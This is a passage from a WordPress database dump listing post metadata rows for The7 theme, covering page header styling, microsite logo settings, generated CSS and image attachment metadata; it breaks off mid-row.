(35134,5132,'_dt_fancy_header_padding-bottom','0px'),
(35135,5132,'_dt_fancy_header_breadcrumbs_heading',''),
(35136,5132,'_dt_fancy_header_breadcrumbs','disabled'),
(35137,5132,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(35138,5132,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(35139,5132,'_dt_fancy_header_title_heading',''),
(35140,5132,'_dt_fancy_header_title_mode','generic'),
(35141,5132,'_dt_fancy_header_title',''),
(35142,5132,'_dt_fancy_header_title_font_size','30'),
(35143,5132,'_dt_fancy_header_title_line_height','36'),
(35144,5132,'_dt_fancy_header_text_transform','none'),
(35145,5132,'_dt_fancy_header_title_color_mode','color'),
(35146,5132,'_dt_fancy_header_title_color','#ffffff'),
(35147,5132,'_dt_fancy_header_subtitle_heading',''),
(35148,5132,'_dt_fancy_header_subtitle',''),
(35149,5132,'_dt_fancy_header_subtitle_font_size','18'),
(35150,5132,'_dt_fancy_header_subtitle_line_height','26'),
(35151,5132,'_dt_fancy_header_subtitle_text_transform','none'),
(35152,5132,'_dt_fancy_header_subtitle_color_mode','color'),
(35153,5132,'_dt_fancy_header_subtitle_color','#ffffff'),
(35154,5132,'_dt_fancy_header_bg_heading',''),
(35155,5132,'_dt_fancy_header_bg_color','#222222'),
(35156,5132,'_dt_fancy_header_bg_image_origin','custom'),
(35157,5132,'_dt_fancy_header_bg_image','a:0:{}'),
(35158,5132,'_dt_fancy_header_bg_repeat','no-repeat'),
(35159,5132,'_dt_fancy_header_bg_position_x','center'),
(35160,5132,'_dt_fancy_header_bg_position_y','center'),
(35161,5132,'_dt_fancy_header_bg_fullscreen','1'),
(35162,5132,'_dt_fancy_header_bg_overlay','0'),
(35163,5132,'_dt_fancy_header_overlay_color','#000'),
(35164,5132,'_dt_fancy_header_bg_overlay_opacity','50'),
(35165,5132,'_dt_fancy_header_scroll_effect','default'),
(35166,5132,'_dt_fancy_header_bg_parallax','0.5'),
(35167,5132,'_dt_fancy_header_responsiveness_heading',''),
(35168,5132,'_dt_fancy_header_responsiveness','disabled'),
(35169,5132,'_dt_fancy_header_responsiveness_switch','778px'),
(35170,5132,'_dt_fancy_header_responsive_height','70'),
(35171,5132,'_dt_fancy_header_responsive_font_size','30'),
(35172,5132,'_dt_fancy_header_responsive_title_line_height','38'),
(35173,5132,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(35174,5132,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(35175,5132,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(35176,5132,'_dt_post_options_back_button',''),
(35177,5132,'_dt_post_options_hide_thumbnail','0'),
(35178,5132,'_dt_post_options_related_mode','same'),
(35179,5132,'_dt_post_options_preview','normal'),
(35180,5132,'_dt_microsite_primary_menu',''),
(35181,5132,'_dt_microsite_split_left_menu',''),
(35182,5132,'_dt_microsite_split_right_menu',''),
(35183,5132,'_dt_microsite_mobile_menu',''),
(35184,5132,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(35189,3066,'_wpb_shortcodes_custom_css_updated','1'),
(35192,53,'_wpb_shortcodes_custom_css_updated','1'),
(35193,3233,'_wpb_shortcodes_custom_css_updated','1'),
(35201,5132,'_dt_microsite_page_layout','wide'),
(35202,5132,'_dt_microsite_page_loading','enabled'),
(35203,5132,'_dt_microsite_logo_link',''),
(35204,5132,'main_logo_heading',''),
(35205,5132,'_dt_microsite_main_logo_type','default'),
(35206,5132,'_dt_microsite_main_logo_regular','a:0:{}'),
(35207,5132,'_dt_microsite_main_logo_hd','a:0:{}'),
(35208,5132,'transparent_logo_heading',''),
(35209,5132,'_dt_microsite_transparent_logo_type','default'),
(35210,5132,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(35211,5132,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(35212,5132,'mixed_logo_heading',''),
(35213,5132,'_dt_microsite_mixed_logo_type','default'),
(35214,5132,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(35215,5132,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(35216,5132,'mixed_transparent_logo_heading',''),
(35217,5132,'_dt_microsite_mixed_transparent_logo_type','default'),
(35218,5132,'_dt_microsite_mixed_transparent_logo_regular','a:0:{}'),
(35219,5132,'_dt_microsite_mixed_transparent_logo_hd','a:0:{}'),
(35220,5132,'floating_logo_heading',''),
(35221,5132,'_dt_microsite_floating_logo_type','default'),
(35222,5132,'_dt_microsite_floating_logo_regular','a:0:{}'),
(35223,5132,'_dt_microsite_floating_logo_hd','a:0:{}'),
(35224,5132,'_dt_microsite_mobile_logo_type','default'),
(35225,5132,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(35226,5132,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(35227,5132,'_dt_microsite_transparent_mobile_logo_type','default'),
(35228,5132,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(35229,5132,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(35230,5132,'bottom_logo_heading',''),
(35231,5132,'_dt_microsite_bottom_logo_type','default'),
(35232,5132,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(35233,5132,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(35234,5132,'favicon_heading',''),
(35235,5132,'_dt_microsite_favicon_type','default'),
(35236,5132,'_dt_microsite_favicon','a:0:{}'),
(35237,5132,'_dt_microsite_favicon_hd','a:0:{}'),
(35243,5122,'_dt_fancy_header_layout_heading',''),
(35244,5122,'_dt_fancy_header_title_aligment','center'),
(35245,5122,'_dt_fancy_header_height','300'),
(35246,5122,'_dt_fancy_header_padding-top','0px'),
(35247,5122,'_dt_fancy_header_padding-bottom','0px'),
(35248,5122,'_dt_fancy_header_breadcrumbs_heading',''),
(35249,5122,'_dt_fancy_header_breadcrumbs','disabled'),
(35250,5122,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(35251,5122,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(35252,5122,'_dt_fancy_header_title_heading',''),
(35253,5122,'_dt_fancy_header_title_mode','generic'),
(35254,5122,'_dt_fancy_header_title',''),
(35255,5122,'_dt_fancy_header_title_font_size','30'),
(35256,5122,'_dt_fancy_header_title_line_height','36'),
(35257,5122,'_dt_fancy_header_text_transform','none'),
(35258,5122,'_dt_fancy_header_title_color_mode','color'),
(35259,5122,'_dt_fancy_header_title_color','#ffffff'),
(35260,5122,'_dt_fancy_header_subtitle_heading',''),
(35261,5122,'_dt_fancy_header_subtitle',''),
(35262,5122,'_dt_fancy_header_subtitle_font_size','18'),
(35263,5122,'_dt_fancy_header_subtitle_line_height','26'),
(35264,5122,'_dt_fancy_header_subtitle_text_transform','none'),
(35265,5122,'_dt_fancy_header_subtitle_color_mode','color'),
(35266,5122,'_dt_fancy_header_subtitle_color','#ffffff'),
(35267,5122,'_dt_fancy_header_bg_heading',''),
(35268,5122,'_dt_fancy_header_bg_color','#222222'),
(35269,5122,'_dt_fancy_header_bg_image_origin','custom'),
(35270,5122,'_dt_fancy_header_bg_image','a:0:{}'),
(35271,5122,'_dt_fancy_header_bg_repeat','no-repeat'),
(35272,5122,'_dt_fancy_header_bg_position_x','center'),
(35273,5122,'_dt_fancy_header_bg_position_y','center'),
(35274,5122,'_dt_fancy_header_bg_fullscreen','1'),
(35275,5122,'_dt_fancy_header_bg_overlay','0'),
(35276,5122,'_dt_fancy_header_overlay_color','#000'),
(35277,5122,'_dt_fancy_header_bg_overlay_opacity','50'),
(35278,5122,'_dt_fancy_header_scroll_effect','default'),
(35279,5122,'_dt_fancy_header_bg_parallax','0.5'),
(35280,5122,'_dt_fancy_header_responsiveness_heading',''),
(35281,5122,'_dt_fancy_header_responsiveness','enabled'),
(35282,5122,'_dt_fancy_header_responsiveness_switch','778px'),
(35283,5122,'_dt_fancy_header_responsive_height','70'),
(35284,5122,'_dt_fancy_header_responsive_font_size','30'),
(35285,5122,'_dt_fancy_header_responsive_title_line_height','38'),
(35286,5122,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(35287,5122,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(35288,5122,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(35289,5122,'_dt_microsite_page_layout','wide'),
(35290,5122,'_dt_microsite_page_loading','enabled'),
(35291,5122,'_dt_microsite_logo_link',''),
(35292,5122,'main_logo_heading',''),
(35293,5122,'_dt_microsite_main_logo_type','default'),
(35294,5122,'_dt_microsite_main_logo_regular','a:0:{}'),
(35295,5122,'_dt_microsite_main_logo_hd','a:0:{}'),
(35296,5122,'transparent_logo_heading',''),
(35297,5122,'_dt_microsite_transparent_logo_type','default'),
(35298,5122,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(35299,5122,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(35300,5122,'mixed_logo_heading',''),
(35301,5122,'_dt_microsite_mixed_logo_type','default'),
(35302,5122,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(35303,5122,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(35304,5122,'mixed_transparent_logo_heading',''),
(35305,5122,'_dt_microsite_mixed_transparent_logo_type','default'),
(35306,5122,'_dt_microsite_mixed_transparent_logo_regular','a:0:{}'),
(35307,5122,'_dt_microsite_mixed_transparent_logo_hd','a:0:{}'),
(35308,5122,'floating_logo_heading',''),
(35309,5122,'_dt_microsite_floating_logo_type','default'),
(35310,5122,'_dt_microsite_floating_logo_regular','a:0:{}'),
(35311,5122,'_dt_microsite_floating_logo_hd','a:0:{}'),
(35312,5122,'_dt_microsite_mobile_logo_type','default'),
(35313,5122,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(35314,5122,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(35315,5122,'_dt_microsite_transparent_mobile_logo_type','default'),
(35316,5122,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(35317,5122,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(35318,5122,'bottom_logo_heading',''),
(35319,5122,'_dt_microsite_bottom_logo_type','default'),
(35320,5122,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(35321,5122,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(35322,5122,'favicon_heading',''),
(35323,5122,'_dt_microsite_favicon_type','default'),
(35324,5122,'_dt_microsite_favicon','a:0:{}'),
(35325,5122,'_dt_microsite_favicon_hd','a:0:{}'),
(35326,5122,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(35327,5139,'_edit_lock','1692945074:1'),
(35328,5139,'_edit_last','1'),
(35329,5139,'_wp_page_template','template-microsite.php'),
(35332,5139,'_wpb_vc_js_status','false'),
(35333,5139,'_dt_sidebar_position','disabled'),
(35334,5139,'_dt_sidebar_widgetarea_id','sidebar_1'),
(35335,5139,'_dt_sidebar_hide_on_mobile','0'),
(35336,5139,'_dt_footer_show','0'),
(35337,5139,'_dt_footer_widgetarea_id','sidebar_2'),
(35338,5139,'_dt_footer_hide_on_mobile','0'),
(35339,5139,'_dt_header_title','fancy'),
(35340,5139,'_dt_header_background','normal'),
(35341,5139,'_dt_header_background_below_slideshow','disabled'),
(35342,5139,'_dt_header_transparent_bg_color_scheme','light'),
(35343,5139,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(35344,5139,'_dt_header_transparent_top_bar_bg_opacity','25'),
(35345,5139,'_dt_header_transparent_bg_color','#000000'),
(35346,5139,'_dt_header_transparent_bg_opacity','50'),
(35347,5139,'_dt_header_disabled_background','normal'),
(35348,5139,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(35349,5139,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(35350,5139,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(35351,5139,'_dt_header_disabled_transparent_bg_color','#000000'),
(35352,5139,'_dt_header_disabled_transparent_bg_opacity','50'),
(35353,5139,'_dt_page_overrides_top_margin',''),
(35354,5139,'_dt_page_overrides_right_margin',''),
(35355,5139,'_dt_page_overrides_bottom_margin',''),
(35356,5139,'_dt_page_overrides_left_margin',''),
(35357,5139,'_dt_mobile_page_padding_top',''),
(35358,5139,'_dt_mobile_page_padding_right',''),
(35359,5139,'_dt_mobile_page_padding_bottom',''),
(35360,5139,'_dt_mobile_page_padding_left',''),
(35361,5139,'_dt_fancy_header_layout_heading',''),
(35362,5139,'_dt_fancy_header_title_aligment','center'),
(35363,5139,'_dt_fancy_header_height','300'),
(35364,5139,'_dt_fancy_header_padding-top','0px'),
(35365,5139,'_dt_fancy_header_padding-bottom','0px'),
(35366,5139,'_dt_fancy_header_breadcrumbs_heading',''),
(35367,5139,'_dt_fancy_header_breadcrumbs','disabled'),
(35368,5139,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(35369,5139,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(35370,5139,'_dt_fancy_header_title_heading',''),
(35371,5139,'_dt_fancy_header_title_mode','generic'),
(35372,5139,'_dt_fancy_header_title',''),
(35373,5139,'_dt_fancy_header_title_font_size','30'),
(35374,5139,'_dt_fancy_header_title_line_height','36'),
(35375,5139,'_dt_fancy_header_text_transform','none'),
(35376,5139,'_dt_fancy_header_title_color_mode','color'),
(35377,5139,'_dt_fancy_header_title_color','#ffffff'),
(35378,5139,'_dt_fancy_header_subtitle_heading',''),
(35379,5139,'_dt_fancy_header_subtitle',''),
(35380,5139,'_dt_fancy_header_subtitle_font_size','18'),
(35381,5139,'_dt_fancy_header_subtitle_line_height','26'),
(35382,5139,'_dt_fancy_header_subtitle_text_transform','none'),
(35383,5139,'_dt_fancy_header_subtitle_color_mode','color'),
(35384,5139,'_dt_fancy_header_subtitle_color','#ffffff'),
(35385,5139,'_dt_fancy_header_bg_heading',''),
(35386,5139,'_dt_fancy_header_bg_color','#222222'),
(35387,5139,'_dt_fancy_header_bg_image_origin','custom'),
(35388,5139,'_dt_fancy_header_bg_image','a:0:{}'),
(35389,5139,'_dt_fancy_header_bg_repeat','no-repeat'),
(35390,5139,'_dt_fancy_header_bg_position_x','center'),
(35391,5139,'_dt_fancy_header_bg_position_y','center'),
(35392,5139,'_dt_fancy_header_bg_fullscreen','1'),
(35393,5139,'_dt_fancy_header_bg_overlay','0'),
(35394,5139,'_dt_fancy_header_overlay_color','#000'),
(35395,5139,'_dt_fancy_header_bg_overlay_opacity','50'),
(35396,5139,'_dt_fancy_header_scroll_effect','default'),
(35397,5139,'_dt_fancy_header_bg_parallax','0.5'),
(35398,5139,'_dt_fancy_header_responsiveness_heading',''),
(35399,5139,'_dt_fancy_header_responsiveness','disabled'),
(35400,5139,'_dt_fancy_header_responsiveness_switch','778px'),
(35401,5139,'_dt_fancy_header_responsive_height','70'),
(35402,5139,'_dt_fancy_header_responsive_font_size','30'),
(35403,5139,'_dt_fancy_header_responsive_title_line_height','38'),
(35404,5139,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(35405,5139,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(35406,5139,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(35407,5139,'_dt_post_options_back_button',''),
(35408,5139,'_dt_post_options_hide_thumbnail','1'),
(35409,5139,'_dt_post_options_related_mode','same'),
(35410,5139,'_dt_post_options_preview','normal'),
(35411,5139,'_dt_microsite_primary_menu',''),
(35412,5139,'_dt_microsite_split_left_menu',''),
(35413,5139,'_dt_microsite_split_right_menu',''),
(35414,5139,'_dt_microsite_mobile_menu',''),
(35415,5139,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(35423,5139,'_dt_microsite_page_layout','wide'),
(35424,5139,'_dt_microsite_page_loading','enabled'),
(35425,5139,'_dt_microsite_logo_link',''),
(35426,5139,'main_logo_heading',''),
(35427,5139,'_dt_microsite_main_logo_type','default'),
(35428,5139,'_dt_microsite_main_logo_regular','a:0:{}'),
(35429,5139,'_dt_microsite_main_logo_hd','a:0:{}'),
(35430,5139,'transparent_logo_heading',''),
(35431,5139,'_dt_microsite_transparent_logo_type','default'),
(35432,5139,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(35433,5139,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(35434,5139,'mixed_logo_heading',''),
(35435,5139,'_dt_microsite_mixed_logo_type','default'),
(35436,5139,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(35437,5139,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(35438,5139,'mixed_transparent_logo_heading',''),
(35439,5139,'_dt_microsite_mixed_transparent_logo_type','default'),
(35440,5139,'_dt_microsite_mixed_transparent_logo_regular','a:0:{}'),
(35441,5139,'_dt_microsite_mixed_transparent_logo_hd','a:0:{}'),
(35442,5139,'floating_logo_heading',''),
(35443,5139,'_dt_microsite_floating_logo_type','default'),
(35444,5139,'_dt_microsite_floating_logo_regular','a:0:{}'),
(35445,5139,'_dt_microsite_floating_logo_hd','a:0:{}'),
(35446,5139,'_dt_microsite_mobile_logo_type','default'),
(35447,5139,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(35448,5139,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(35449,5139,'_dt_microsite_transparent_mobile_logo_type','default'),
(35450,5139,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(35451,5139,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(35452,5139,'bottom_logo_heading',''),
(35453,5139,'_dt_microsite_bottom_logo_type','default'),
(35454,5139,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(35455,5139,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(35456,5139,'favicon_heading',''),
(35457,5139,'_dt_microsite_favicon_type','default'),
(35458,5139,'_dt_microsite_favicon','a:0:{}'),
(35459,5139,'_dt_microsite_favicon_hd','a:0:{}'),
(35513,5148,'_wp_attached_file','2023/08/main_u2.jpg'),
(35514,5148,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:828;s:4:\"file\";s:19:\"2023/08/main_u2.jpg\";s:8:\"filesize\";i:703500;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"main_u2-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12712;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"main_u2-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82545;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"main_u2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"main_u2-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53614;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"main_u2-500x276.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28929;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:19:\"main_u2-800x442.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:442;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57732;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:20:\"main_u2-1280x707.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35515,5149,'_wp_attached_file','2023/08/main_u2-1.jpg'),
(35516,5149,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:828;s:4:\"file\";s:21:\"2023/08/main_u2-1.jpg\";s:8:\"filesize\";i:703500;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"main_u2-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12712;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u2-1-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82545;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u2-1-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53614;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u2-1-500x276.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28929;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u2-1-800x442.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:442;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57732;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u2-1-1280x707.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35517,5150,'_wp_attached_file','2023/08/main_u3.jpg'),
(35518,5150,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1485;s:6:\"height\";i:743;s:4:\"file\";s:19:\"2023/08/main_u3.jpg\";s:8:\"filesize\";i:629053;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"main_u3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11785;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"main_u3-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73482;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"main_u3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7151;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"main_u3-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48516;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"main_u3-500x250.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25677;}s:6:\"awb_md\";a:5:{s